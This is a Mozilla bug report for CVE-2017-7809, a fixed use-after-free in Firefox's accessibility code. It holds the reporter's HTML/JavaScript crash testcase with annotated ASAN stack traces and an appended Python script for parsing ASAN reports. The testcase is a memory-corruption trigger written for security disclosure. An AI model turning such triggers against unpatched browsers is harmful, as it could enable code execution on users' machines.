Bug 1380284 (CVE-2017-7809)

heap-use-after-free in mozilla::a11y::DocAccessible::RelocateARIAOwnedIfNeeded

RESOLVED FIXED in Firefox -esr52

Status


RESOLVED FIXED
2 years ago
a year ago

People

(Reporter: nils, Assigned: smaug)

Tracking

Keywords: csectype-uaf, sec-high, testcase
Version: unspecified
Target Milestone: mozilla57
Points:
---
Bug Flags:
sec-bounty +

Firefox Tracking Flags

(firefox-esr52 55+ fixed, firefox55+ fixed, firefox56+ fixed, firefox57+ fixed)

Details

(Whiteboard: [adv-main55+][adv-esr52.3+])

Attachments

(3 attachments)

(Reporter)

Description

2 years ago
The following testcase crashes the latest ASAN build of Firefox (BuildID=20170711160010).

<script>
function start() {
	// Accessibility is switched on so the a11y tree walk (DocAccessible::DoInitialUpdate
	// in the READ stack below) runs on the next refresh-driver tick.
	fuzzPriv.enableAccessibility();
	o1=document.createElementNS('http://www.w3.org/1999/xhtml','div');
	o2=document.createElementNS('http://www.w3.org/1999/xhtml','div');
	o4=document.createElementNS('http://www.w3.org/1999/xhtml','div');
	o5=window.document;
	o6=document.documentElement;
	document.documentElement.parentNode.removeChild(o6);
	o1.appendChild(o2);
	o22=window.getSelection();
	o38=document.createElementNS('http://www.w3.org/1999/xhtml','iframe');
	o2.appendChild(o38);
	try{o5.designMode='on';}catch(e){} // editable document: the HTML editor's selection listener is active
	o4.style.position='absolute';
	o5.write('<html><body><div></div><div></div></body></html>');
	o4.prepend(o1,undefined);
	o106=document.createElementNS('http://www.w3.org/1999/xhtml','tr');
	window.top.document.documentElement.appendChild(o4);
	// The selection change makes the editor create an anonymous <span> for its resizers
	// (NS_NewHTMLSpanElement in the "previously allocated" stack below).
	o22.selectAllChildren(o38);
	window.top.document.documentElement.appendChild(o106);
	// Cycle collection frees that span (SnowWhiteKiller in the "freed by" stack below);
	// the a11y tree walk then reads it via HasID() in RelocateARIAOwnedIfNeeded.
	fuzzPriv.GC();fuzzPriv.CC();fuzzPriv.GC();fuzzPriv.CC();
	location.reload();
}
</script>
<body onload="start()"></body>

ASAN output:
=================================================================
==16173==ERROR: AddressSanitizer: heap-use-after-free on address 0x60d00005917c at pc 0x7f323e0d3825 bp 0x7fff23077f90 sp 0x7fff23077f88
READ of size 4 at 0x60d00005917c thread T0 (Web Content)
    #0 0x7f323e0d3824 in GetBoolFlag /home/worker/workspace/build/src/dom/base/nsINode.h:1592:12
    #1 0x7f323e0d3824 in HasID /home/worker/workspace/build/src/dom/base/nsINode.h:1601
    #2 0x7f323e0d3824 in mozilla::a11y::DocAccessible::RelocateARIAOwnedIfNeeded(nsIContent*) /home/worker/workspace/build/src/accessible/generic/DocAccessible.cpp:2043
    #3 0x7f323e069e30 in mozilla::a11y::TreeWalker::AccessibleFor(nsIContent*, unsigned int, bool*) /home/worker/workspace/build/src/accessible/base/TreeWalker.cpp:321:15
    #4 0x7f323e06a317 in mozilla::a11y::TreeWalker::Next() /home/worker/workspace/build/src/accessible/base/TreeWalker.cpp:175:27
    #5 0x7f323e0dcd07 in mozilla::a11y::DocAccessible::CacheChildrenInSubtree(mozilla::a11y::Accessible*, mozilla::a11y::Accessible**) /home/worker/workspace/build/src/accessible/generic/DocAccessible.cpp:2293:39
    #6 0x7f323e0dc1cf in mozilla::a11y::DocAccessible::DoInitialUpdate() /home/worker/workspace/build/src/accessible/generic/DocAccessible.cpp:1516:3
    #7 0x7f323e04aa76 in mozilla::a11y::NotificationController::WillRefresh(mozilla::TimeStamp) /home/worker/workspace/build/src/accessible/base/NotificationController.cpp:627:16
    #8 0x7f323ae61f77 in nsRefreshDriver::Tick(long, mozilla::TimeStamp) /home/worker/workspace/build/src/layout/base/nsRefreshDriver.cpp:1854:12
    #9 0x7f323ae71855 in mozilla::RefreshDriverTimer::TickRefreshDrivers(long, mozilla::TimeStamp, nsTArray<RefPtr<nsRefreshDriver> >&) /home/worker/workspace/build/src/layout/base/nsRefreshDriver.cpp:298:7
    #10 0x7f323ae71524 in mozilla::RefreshDriverTimer::Tick(long, mozilla::TimeStamp) /home/worker/workspace/build/src/layout/base/nsRefreshDriver.cpp:320:5
    #11 0x7f323ae73bbb in RunRefreshDrivers /home/worker/workspace/build/src/layout/base/nsRefreshDriver.cpp:761:5
    #12 0x7f323ae73bbb in mozilla::VsyncRefreshDriverTimer::RefreshDriverVsyncObserver::TickRefreshDriver(mozilla::TimeStamp) /home/worker/workspace/build/src/layout/base/nsRefreshDriver.cpp:674
    #13 0x7f323ae737c5 in mozilla::VsyncRefreshDriverTimer::RefreshDriverVsyncObserver::NotifyVsync(mozilla::TimeStamp) /home/worker/workspace/build/src/layout/base/nsRefreshDriver.cpp:575:9
    #14 0x7f323b6a53e2 in mozilla::layout::VsyncChild::RecvNotify(mozilla::TimeStamp const&) /home/worker/workspace/build/src/layout/ipc/VsyncChild.cpp:67:16
    #15 0x7f32355123c1 in mozilla::layout::PVsyncChild::OnMessageReceived(IPC::Message const&) /home/worker/workspace/build/src/obj-firefox/ipc/ipdl/PVsyncChild.cpp:155:20
    #16 0x7f32350e3f2f in mozilla::ipc::PBackgroundChild::OnMessageReceived(IPC::Message const&) /home/worker/workspace/build/src/obj-firefox/ipc/ipdl/PBackgroundChild.cpp:1608:28
    #17 0x7f323503018e in mozilla::ipc::MessageChannel::DispatchAsyncMessage(IPC::Message const&) /home/worker/workspace/build/src/ipc/glue/MessageChannel.cpp:2093:25
    #18 0x7f323502d2d4 in mozilla::ipc::MessageChannel::DispatchMessage(IPC::Message&&) /home/worker/workspace/build/src/ipc/glue/MessageChannel.cpp:2019:17
    #19 0x7f323502ebb4 in mozilla::ipc::MessageChannel::RunMessage(mozilla::ipc::MessageChannel::MessageTask&) /home/worker/workspace/build/src/ipc/glue/MessageChannel.cpp:1888:5
    #20 0x7f323502f198 in mozilla::ipc::MessageChannel::MessageTask::Run() /home/worker/workspace/build/src/ipc/glue/MessageChannel.cpp:1921:15
    #21 0x7f323421f875 in nsThread::ProcessNextEvent(bool, bool*) /home/worker/workspace/build/src/xpcom/threads/nsThread.cpp:1437:14
    #22 0x7f3234225aa8 in NS_ProcessNextEvent(nsIThread*, bool) /home/worker/workspace/build/src/xpcom/threads/nsThreadUtils.cpp:489:10
    #23 0x7f3235037e41 in mozilla::ipc::MessagePump::Run(base::MessagePump::Delegate*) /home/worker/workspace/build/src/ipc/glue/MessagePump.cpp:97:21
    #24 0x7f3234f940e0 in RunInternal /home/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:320:10
    #25 0x7f3234f940e0 in RunHandler /home/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:313
    #26 0x7f3234f940e0 in MessageLoop::Run() /home/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:293
    #27 0x7f323a7c237f in nsBaseAppShell::Run() /home/worker/workspace/build/src/widget/nsBaseAppShell.cpp:156:27
    #28 0x7f323ea50817 in XRE_RunAppShell() /home/worker/workspace/build/src/toolkit/xre/nsEmbedFunctions.cpp:895:22
    #29 0x7f3234f940e0 in RunInternal /home/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:320:10
    #30 0x7f3234f940e0 in RunHandler /home/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:313
    #31 0x7f3234f940e0 in MessageLoop::Run() /home/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:293
    #32 0x7f323ea5027d in XRE_InitChildProcess(int, char**, XREChildData const*) /home/worker/workspace/build/src/toolkit/xre/nsEmbedFunctions.cpp:711:34
    #33 0x4eb813 in content_process_main /home/worker/workspace/build/src/browser/app/../../ipc/contentproc/plugin-container.cpp:64:30
    #34 0x4eb813 in main /home/worker/workspace/build/src/browser/app/nsBrowserApp.cpp:286
    #35 0x7f325165e82f in __libc_start_main /build/glibc-bfm8X4/glibc-2.23/csu/../csu/libc-start.c:291
    #36 0x41d168 in _start (/home/nils/fuzzer3/firefox/firefox+0x41d168)

0x60d00005917c is located 28 bytes inside of 136-byte region [0x60d000059160,0x60d0000591e8)
freed by thread T0 (Web Content) here:
    #0 0x4bb69b in __interceptor_free /builds/slave/moz-toolchain/src/llvm/projects/compiler-rt/lib/asan/asan_malloc_linux.cc:47:3
    #1 0x7f32340bbc47 in SnowWhiteKiller::~SnowWhiteKiller() /home/worker/workspace/build/src/xpcom/base/nsCycleCollector.cpp:2661:25
    #2 0x7f32340c2e0b in FreeSnowWhite /home/worker/workspace/build/src/xpcom/base/nsCycleCollector.cpp:2849:3
    #3 0x7f32340c2e0b in nsCycleCollector::BeginCollection(ccType, nsICycleCollectorListener*) /home/worker/workspace/build/src/xpcom/base/nsCycleCollector.cpp:3851
    #4 0x7f32340c2323 in nsCycleCollector::Collect(ccType, js::SliceBudget&, nsICycleCollectorListener*, bool) /home/worker/workspace/build/src/xpcom/base/nsCycleCollector.cpp:3672:9
    #5 0x7f32340c6100 in nsCycleCollector_collect(nsICycleCollectorListener*) /home/worker/workspace/build/src/xpcom/base/nsCycleCollector.cpp:4209:21
    #6 0x7f3236f9337d in nsJSContext::CycleCollectNow(nsICycleCollectorListener*) /home/worker/workspace/build/src/dom/base/nsJSEnvironment.cpp:1676:3
    #7 0x7f3236ae145b in nsDOMWindowUtils::CycleCollect(nsICycleCollectorListener*) /home/worker/workspace/build/src/dom/base/nsDOMWindowUtils.cpp:1409:3
    #8 0x7f323423ee21 in NS_InvokeByIndex /home/worker/workspace/build/src/xpcom/reflect/xptcall/md/unix/xptcinvoke_asm_x86_64_unix.S:129
    #9 0x7f3235b22fe0 in Invoke /home/worker/workspace/build/src/js/xpconnect/src/XPCWrappedNative.cpp:1996:12
    #10 0x7f3235b22fe0 in Call /home/worker/workspace/build/src/js/xpconnect/src/XPCWrappedNative.cpp:1315
    #11 0x7f3235b22fe0 in XPCWrappedNative::CallMethod(XPCCallContext&, XPCWrappedNative::CallMode) /home/worker/workspace/build/src/js/xpconnect/src/XPCWrappedNative.cpp:1282
    #12 0x7f3235b2a05f in XPC_WN_CallMethod(JSContext*, unsigned int, JS::Value*) /home/worker/workspace/build/src/js/xpconnect/src/XPCWrappedNativeJSOps.cpp:967:12
    #13 0x7f323ef1d164 in CallJSNative /home/worker/workspace/build/src/js/src/jscntxtinlines.h:293:15
    #14 0x7f323ef1d164 in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&, js::MaybeConstruct) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:470
    #15 0x7f323ef05f8b in CallFromStack /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:521:12
    #16 0x7f323ef05f8b in Interpret(JSContext*, js::RunState&) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:3060
    #17 0x7f323eeecd08 in js::RunScript(JSContext*, js::RunState&) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:410:12
    #18 0x7f323ef1d2fc in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&, js::MaybeConstruct) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:488:15
    #19 0x7f323ef1dc52 in js::Call(JSContext*, JS::Handle<JS::Value>, JS::Handle<JS::Value>, js::AnyInvokeArgs const&, JS::MutableHandle<JS::Value>) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:534:10
    #20 0x7f323f894243 in JS_CallFunctionValue(JSContext*, JS::Handle<JSObject*>, JS::Handle<JS::Value>, JS::HandleValueArray const&, JS::MutableHandle<JS::Value>) /home/worker/workspace/build/src/js/src/jsapi.cpp:2889:12
    #21 0x7f3235a44a1b in xpc::FunctionForwarder(JSContext*, unsigned int, JS::Value*) /home/worker/workspace/build/src/js/xpconnect/src/ExportHelpers.cpp:315:18
    #22 0x7f323ef1d164 in CallJSNative /home/worker/workspace/build/src/js/src/jscntxtinlines.h:293:15
    #23 0x7f323ef1d164 in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&, js::MaybeConstruct) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:470
    #24 0x7f323ef05f8b in CallFromStack /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:521:12
    #25 0x7f323ef05f8b in Interpret(JSContext*, js::RunState&) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:3060
    #26 0x7f323eeecd08 in js::RunScript(JSContext*, js::RunState&) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:410:12
    #27 0x7f323ef1d2fc in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&, js::MaybeConstruct) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:488:15
    #28 0x7f323ef1dc52 in js::Call(JSContext*, JS::Handle<JS::Value>, JS::Handle<JS::Value>, js::AnyInvokeArgs const&, JS::MutableHandle<JS::Value>) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:534:10
    #29 0x7f323f8960cb in JS::Call(JSContext*, JS::Handle<JS::Value>, JS::Handle<JS::Value>, JS::HandleValueArray const&, JS::MutableHandle<JS::Value>) /home/worker/workspace/build/src/js/src/jsapi.cpp:2948:12
    #30 0x7f323837d2b5 in mozilla::dom::EventHandlerNonNull::Call(JSContext*, JS::Handle<JS::Value>, mozilla::dom::Event&, JS::MutableHandle<JS::Value>, mozilla::ErrorResult&) /home/worker/workspace/build/src/obj-firefox/dom/bindings/EventHandlerBinding.cpp:260:37
    #31 0x7f3238d342b5 in Call<nsISupports *> /home/worker/workspace/build/src/obj-firefox/dist/include/mozilla/dom/EventHandlerBinding.h:362:12
    #32 0x7f3238d342b5 in mozilla::JSEventHandler::HandleEvent(nsIDOMEvent*) /home/worker/workspace/build/src/dom/events/JSEventHandler.cpp:215
    #33 0x7f3238cfc219 in mozilla::EventListenerManager::HandleEventSubType(mozilla::EventListenerManager::Listener*, nsIDOMEvent*, mozilla::dom::EventTarget*) /home/worker/workspace/build/src/dom/events/EventListenerManager.cpp:1141:51
    #34 0x7f3238cfe2a4 in mozilla::EventListenerManager::HandleEventInternal(nsPresContext*, mozilla::WidgetEvent*, nsIDOMEvent**, mozilla::dom::EventTarget*, nsEventStatus*) /home/worker/workspace/build/src/dom/events/EventListenerManager.cpp:1311:20
    #35 0x7f3238cddfa1 in mozilla::EventTargetChainItem::HandleEventTargetChain(nsTArray<mozilla::EventTargetChainItem>&, mozilla::EventChainPostVisitor&, mozilla::EventDispatchingCallback*, mozilla::ELMCreationDetector&) /home/worker/workspace/build/src/dom/events/EventDispatcher.cpp:464:16
    #36 0x7f3238ce1472 in mozilla::EventDispatcher::Dispatch(nsISupports*, nsPresContext*, mozilla::WidgetEvent*, nsIDOMEvent*, nsEventStatus*, mozilla::EventDispatchingCallback*, nsTArray<mozilla::dom::EventTarget*>*) /home/worker/workspace/build/src/dom/events/EventDispatcher.cpp:824:9
    #37 0x7f323afc4e6f in nsDocumentViewer::LoadComplete(nsresult) /home/worker/workspace/build/src/layout/base/nsDocumentViewer.cpp:1104:7

previously allocated by thread T0 (Web Content) here:
    #0 0x4bb9ec in malloc /builds/slave/moz-toolchain/src/llvm/projects/compiler-rt/lib/asan/asan_malloc_linux.cc:64:3
    #1 0x4ecf0d in moz_xmalloc /home/worker/workspace/build/src/memory/mozalloc/mozalloc.cpp:83:17
    #2 0x7f3239075493 in operator new /home/worker/workspace/build/src/obj-firefox/dist/include/mozilla/mozalloc.h:194:12
    #3 0x7f3239075493 in NS_NewHTMLSpanElement(already_AddRefed<mozilla::dom::NodeInfo>&&, mozilla::dom::FromParser) /home/worker/workspace/build/src/dom/html/HTMLSpanElement.cpp:15
    #4 0x7f32390fda92 in CreateHTMLElement /home/worker/workspace/build/src/dom/html/nsHTMLContentSink.cpp:287:41
    #5 0x7f32390fda92 in NS_NewHTMLElement(mozilla::dom::Element**, already_AddRefed<mozilla::dom::NodeInfo>&&, mozilla::dom::FromParser, nsAString const*) /home/worker/workspace/build/src/dom/html/nsHTMLContentSink.cpp:258
    #6 0x7f3236fc48c3 in NS_NewElement(mozilla::dom::Element**, already_AddRefed<mozilla::dom::NodeInfo>&&, mozilla::dom::FromParser, nsAString const*) /home/worker/workspace/build/src/dom/base/nsNameSpaceManager.cpp:183:12
    #7 0x7f3236eb23bb in nsDocument::CreateElem(nsAString const&, nsIAtom*, int, nsAString const*) /home/worker/workspace/build/src/dom/base/nsDocument.cpp:8463:17
    #8 0x7f323a8e6531 in mozilla::EditorBase::CreateHTMLContent(nsIAtom*) /home/worker/workspace/build/src/editor/libeditor/EditorBase.cpp:4720:15
    #9 0x7f323a945bb8 in mozilla::HTMLEditor::CreateAnonymousElement(nsIAtom*, nsIDOMNode*, nsAString const&, bool) /home/worker/workspace/build/src/editor/libeditor/HTMLAnonymousNodeEditor.cpp:191:32
    #10 0x7f323aa25f1c in CreateResizingInfo /home/worker/workspace/build/src/editor/libeditor/HTMLEditorObjectResizer.cpp:210:5
    #11 0x7f323aa25f1c in mozilla::HTMLEditor::ShowResizersInner(nsIDOMElement*) /home/worker/workspace/build/src/editor/libeditor/HTMLEditorObjectResizer.cpp:350
    #12 0x7f323a9480ee in ShowResizers /home/worker/workspace/build/src/editor/libeditor/HTMLEditorObjectResizer.cpp:283:17
    #13 0x7f323a9480ee in mozilla::HTMLEditor::CheckSelectionStateForAnonymousButtons(nsISelection*) /home/worker/workspace/build/src/editor/libeditor/HTMLAnonymousNodeEditor.cpp:455
    #14 0x7f323aa2185f in mozilla::ResizerSelectionListener::NotifySelectionChanged(nsIDOMDocument*, nsISelection*, short) /home/worker/workspace/build/src/editor/libeditor/HTMLEditorObjectResizer.cpp:93:19
    #15 0x7f3236d40356 in mozilla::dom::Selection::NotifySelectionListeners() /home/worker/workspace/build/src/dom/base/Selection.cpp:3764:15
    #16 0x7f323b1ddfc0 in NotifySelectionListeners /home/worker/workspace/build/src/layout/generic/nsFrameSelection.cpp:2069:23
    #17 0x7f323b1ddfc0 in nsFrameSelection::EndBatchChanges(short) /home/worker/workspace/build/src/layout/generic/nsFrameSelection.cpp:2057
    #18 0x7f3236d40b56 in mozilla::dom::Selection::EndBatchChangesInternal(short) /home/worker/workspace/build/src/dom/base/Selection.cpp:3792:21
    #19 0x7f3236d3bf1b in ~SelectionBatcher /home/worker/workspace/build/src/dom/base/Selection.h:484:19
    #20 0x7f3236d3bf1b in mozilla::dom::Selection::SelectAllChildren(nsINode&, mozilla::ErrorResult&) /home/worker/workspace/build/src/dom/base/Selection.cpp:3186
    #21 0x7f3236d3c074 in mozilla::dom::Selection::SelectAllChildrenJS(nsINode&, mozilla::ErrorResult&) /home/worker/workspace/build/src/dom/base/Selection.cpp:3169:3
    #22 0x7f3237b86365 in mozilla::dom::SelectionBinding::selectAllChildren(JSContext*, JS::Handle<JSObject*>, mozilla::dom::Selection*, JSJitMethodCallArgs const&) /home/worker/workspace/build/src/obj-firefox/dom/bindings/SelectionBinding.cpp:719:9
    #23 0x7f32389358a0 in mozilla::dom::GenericBindingMethod(JSContext*, unsigned int, JS::Value*) /home/worker/workspace/build/src/dom/bindings/BindingUtils.cpp:3060:13
    #24 0x7f323ef1d164 in CallJSNative /home/worker/workspace/build/src/js/src/jscntxtinlines.h:293:15
    #25 0x7f323ef1d164 in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&, js::MaybeConstruct) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:470
    #26 0x7f323ef05f8b in CallFromStack /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:521:12
    #27 0x7f323ef05f8b in Interpret(JSContext*, js::RunState&) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:3060
    #28 0x7f323eeecd08 in js::RunScript(JSContext*, js::RunState&) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:410:12
    #29 0x7f323ef1d2fc in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&, js::MaybeConstruct) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:488:15
    #30 0x7f323ef1dc52 in js::Call(JSContext*, JS::Handle<JS::Value>, JS::Handle<JS::Value>, js::AnyInvokeArgs const&, JS::MutableHandle<JS::Value>) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:534:10
    #31 0x7f323f8960cb in JS::Call(JSContext*, JS::Handle<JS::Value>, JS::Handle<JS::Value>, JS::HandleValueArray const&, JS::MutableHandle<JS::Value>) /home/worker/workspace/build/src/js/src/jsapi.cpp:2948:12
    #32 0x7f323837d2b5 in mozilla::dom::EventHandlerNonNull::Call(JSContext*, JS::Handle<JS::Value>, mozilla::dom::Event&, JS::MutableHandle<JS::Value>, mozilla::ErrorResult&) /home/worker/workspace/build/src/obj-firefox/dom/bindings/EventHandlerBinding.cpp:260:37
    #33 0x7f3238d342b5 in Call<nsISupports *> /home/worker/workspace/build/src/obj-firefox/dist/include/mozilla/dom/EventHandlerBinding.h:362:12
    #34 0x7f3238d342b5 in mozilla::JSEventHandler::HandleEvent(nsIDOMEvent*) /home/worker/workspace/build/src/dom/events/JSEventHandler.cpp:215
    #35 0x7f3238cfc219 in mozilla::EventListenerManager::HandleEventSubType(mozilla::EventListenerManager::Listener*, nsIDOMEvent*, mozilla::dom::EventTarget*) /home/worker/workspace/build/src/dom/events/EventListenerManager.cpp:1141:51
    #36 0x7f3238cfe2a4 in mozilla::EventListenerManager::HandleEventInternal(nsPresContext*, mozilla::WidgetEvent*, nsIDOMEvent**, mozilla::dom::EventTarget*, nsEventStatus*) /home/worker/workspace/build/src/dom/events/EventListenerManager.cpp:1311:20
    #37 0x7f3238cddfa1 in mozilla::EventTargetChainItem::HandleEventTargetChain(nsTArray<mozilla::EventTargetChainItem>&, mozilla::EventChainPostVisitor&, mozilla::EventDispatchingCallback*, mozilla::ELMCreationDetector&) /home/worker/workspace/build/src/dom/events/EventDispatcher.cpp:464:16
    #38 0x7f3238ce1472 in mozilla::EventDispatcher::Dispatch(nsISupports*, nsPresContext*, mozilla::WidgetEvent*, nsIDOMEvent*, nsEventStatus*, mozilla::EventDispatchingCallback*, nsTArray<mozilla::dom::EventTarget*>*) /home/worker/workspace/build/src/dom/events/EventDispatcher.cpp:824:9

SUMMARY: AddressSanitizer: heap-use-after-free /home/worker/workspace/build/src/dom/base/nsINode.h:1592:12 in GetBoolFlag
Shadow bytes around the buggy address:
  0x0c1a800031d0: 00 00 00 00 00 fa fa fa fa fa fa fa fa fa fd fd
  0x0c1a800031e0: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fa
  0x0c1a800031f0: fa fa fa fa fa fa fa fa fd fd fd fd fd fd fd fd
  0x0c1a80003200: fd fd fd fd fd fd fd fd fd fa fa fa fa fa fa fa
  0x0c1a80003210: fa fa 00 00 00 00 00 00 00 00 00 00 00 00 00 00
=>0x0c1a80003220: 00 00 00 00 fa fa fa fa fa fa fa fa fd fd fd[fd]
  0x0c1a80003230: fd fd fd fd fd fd fd fd fd fd fd fd fd fa fa fa
  0x0c1a80003240: fa fa fa fa fa fa 00 00 00 00 00 00 00 00 00 00
  0x0c1a80003250: 00 00 00 00 00 00 00 fa fa fa fa fa fa fa fa fa
  0x0c1a80003260: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
  0x0c1a80003270: fd fa fa fa fa fa fa fa fa fa fd fd fd fd fd fd
Shadow byte legend (one shadow byte represents 8 application bytes):
  Addressable:           00
  Partially addressable: 01 02 03 04 05 06 07 
  Heap left redzone:       fa
  Heap right redzone:      fb
  Freed heap region:       fd
  Stack left redzone:      f1
  Stack mid redzone:       f2
  Stack right redzone:     f3
  Stack partial redzone:   f4
  Stack after return:      f5
  Stack use after scope:   f8
  Global redzone:          f9
  Global init order:       f6
  Poisoned by user:        f7
  Container overflow:      fc
  Array cookie:            ac
  Intra object redzone:    bb
  ASan internal:           fe
  Left alloca redzone:     ca
  Right alloca redzone:    cb
==16173==ABORTING
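The ASAN report above carries the three things a triager needs: the faulting read, the free site and the allocation site. The script below is an added example, not part of this bug report or of Firefox, that parses a report in this format, cross-checks that the faulting address really lies at the printed offset inside the chunk ASAN says was freed, and names the first non-allocator frame of each stack (so the free site reads as the cycle collector's SnowWhiteKiller rather than __interceptor_free, and the allocation as NS_NewHTMLSpanElement rather than malloc). Its input is a constructed, trimmed excerpt of the report above; the helper names (parse_asan_report, first_project_frame, summarize) are this example's own.

```python
# Added example (not from the bug report or Firefox): a triage helper for ASAN
# heap-use-after-free reports. SAMPLE is a constructed, trimmed excerpt of the
# report above; every helper name here is this example's own.
import re
from dataclasses import dataclass, field
from typing import List, Optional, Tuple

SAMPLE = """\
==16173==ERROR: AddressSanitizer: heap-use-after-free on address 0x60d00005917c at pc 0x7f323e0d3825 bp 0x7fff23077f90 sp 0x7fff23077f88
READ of size 4 at 0x60d00005917c thread T0 (Web Content)
    #0 0x7f323e0d3824 in GetBoolFlag /home/worker/workspace/build/src/dom/base/nsINode.h:1592:12
    #1 0x7f323e0d3824 in HasID /home/worker/workspace/build/src/dom/base/nsINode.h:1601
    #2 0x7f323e0d3824 in mozilla::a11y::DocAccessible::RelocateARIAOwnedIfNeeded(nsIContent*) /home/worker/workspace/build/src/accessible/generic/DocAccessible.cpp:2043

0x60d00005917c is located 28 bytes inside of 136-byte region [0x60d000059160,0x60d0000591e8)
freed by thread T0 (Web Content) here:
    #0 0x4bb69b in __interceptor_free /builds/slave/moz-toolchain/src/llvm/projects/compiler-rt/lib/asan/asan_malloc_linux.cc:47:3
    #1 0x7f32340bbc47 in SnowWhiteKiller::~SnowWhiteKiller() /home/worker/workspace/build/src/xpcom/base/nsCycleCollector.cpp:2661:25

previously allocated by thread T0 (Web Content) here:
    #0 0x4bb9ec in malloc /builds/slave/moz-toolchain/src/llvm/projects/compiler-rt/lib/asan/asan_malloc_linux.cc:64:3
    #1 0x4ecf0d in moz_xmalloc /home/worker/workspace/build/src/memory/mozalloc/mozalloc.cpp:83:17
    #2 0x7f3239075493 in operator new /home/worker/workspace/build/src/obj-firefox/dist/include/mozilla/mozalloc.h:194:12
    #3 0x7f3239075493 in NS_NewHTMLSpanElement(already_AddRefed<mozilla::dom::NodeInfo>&&, mozilla::dom::FromParser) /home/worker/workspace/build/src/dom/html/HTMLSpanElement.cpp:15

SUMMARY: AddressSanitizer: heap-use-after-free /home/worker/workspace/build/src/dom/base/nsINode.h:1592:12 in GetBoolFlag
"""

HEADER_RE = re.compile(r"ERROR: AddressSanitizer: (?P<kind>[\w-]+) on address 0x(?P<addr>[0-9a-f]+)")
ACCESS_RE = re.compile(r"^(?P<op>READ|WRITE) of size (?P<size>\d+) at 0x[0-9a-f]+ thread (?P<thread>T\d+)")
REGION_RE = re.compile(r"^0x[0-9a-f]+ is located (?P<off>\d+) bytes inside of \d+-byte region "
                       r"\[0x(?P<lo>[0-9a-f]+),0x(?P<hi>[0-9a-f]+)\)")
FRAME_RE = re.compile(r"^\s*#(?P<n>\d+) 0x[0-9a-f]+ in (?P<func>.+) (?P<loc>\S+)$")  # loc = last token

@dataclass
class Frame:
    index: int
    func: str
    location: str

@dataclass
class AsanReport:
    kind: str = ""
    address: int = 0
    access: str = ""      # READ or WRITE
    size: int = 0
    thread: str = ""
    region: Optional[Tuple[int, int]] = None   # [lo, hi) of the chunk ASAN says was freed
    region_offset: int = -1                    # offset ASAN printed for the faulting address
    access_stack: List[Frame] = field(default_factory=list)
    free_stack: List[Frame] = field(default_factory=list)
    alloc_stack: List[Frame] = field(default_factory=list)

    def address_in_freed_region(self) -> bool:
        # Cross-check header against region line: a mismatch means the log was truncated
        # or two reports were interleaved, and the stacks below should not be trusted.
        if self.region is None:
            return False
        lo, hi = self.region
        return lo <= self.address < hi and self.address - lo == self.region_offset

def parse_asan_report(text: str) -> AsanReport:
    rep, current = AsanReport(), None  # current: the stack that following frame lines belong to
    for line in text.splitlines():
        if m := HEADER_RE.search(line):
            rep.kind, rep.address = m["kind"], int(m["addr"], 16)
        elif m := ACCESS_RE.match(line):
            rep.access, rep.size, rep.thread = m["op"], int(m["size"]), m["thread"]
            current = rep.access_stack
        elif m := REGION_RE.match(line):
            rep.region, rep.region_offset = (int(m["lo"], 16), int(m["hi"], 16)), int(m["off"])
        elif line.startswith("freed by thread"):
            current = rep.free_stack
        elif line.startswith("previously allocated by thread"):
            current = rep.alloc_stack
        elif line.startswith("SUMMARY:"):
            current = None
        elif (m := FRAME_RE.match(line)) and current is not None:
            current.append(Frame(int(m["n"]), m["func"], m["loc"]))
    return rep

ALLOCATOR_NOISE = {"malloc", "free", "moz_xmalloc", "operator new", "operator delete"}

def first_project_frame(stack: List[Frame]) -> Optional[Frame]:
    # Skip the ASAN interceptor and allocator wrappers so the result is the frame a
    # triager actually has to read (the CC's SnowWhiteKiller, not __interceptor_free).
    for f in stack:
        if "/compiler-rt/" in f.location or f.func.startswith("__interceptor_"):
            continue
        if f.func not in ALLOCATOR_NOISE:
            return f
    return None

def summarize(rep: AsanReport) -> str:
    lines = [f"{rep.kind}: {rep.access} of {rep.size} bytes at 0x{rep.address:x} on {rep.thread}"]
    if rep.region:
        lo, hi = rep.region
        ok = "consistent" if rep.address_in_freed_region() else "INCONSISTENT"
        lines.append(f"  chunk: {hi - lo} bytes at [0x{lo:x},0x{hi:x}), access at +{rep.region_offset} ({ok})")
    for label, stack in (("use", rep.access_stack), ("free", rep.free_stack), ("alloc", rep.alloc_stack)):
        f = first_project_frame(stack)
        lines.append(f"  {label:5}: {f.func} at {f.location}" if f else f"  {label:5}: <no frames>")
    return "\n".join(lines)

REPORT = parse_asan_report(SAMPLE)

if __name__ == "__main__":
    print(summarize(REPORT))
```

Running it prints one line per stack plus the chunk size (136 bytes here, which matches the HTMLSpanElement allocation rather than some unrelated object) and flags the report as consistent because 0x60d00005917c - 0x60d000059160 is exactly the 28-byte offset ASAN printed. Feed it a full report and the regexes still work, since a frame's function text is everything up to the last whitespace-separated token (the source location), which is what keeps template arguments with spaces intact.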
(Reporter)

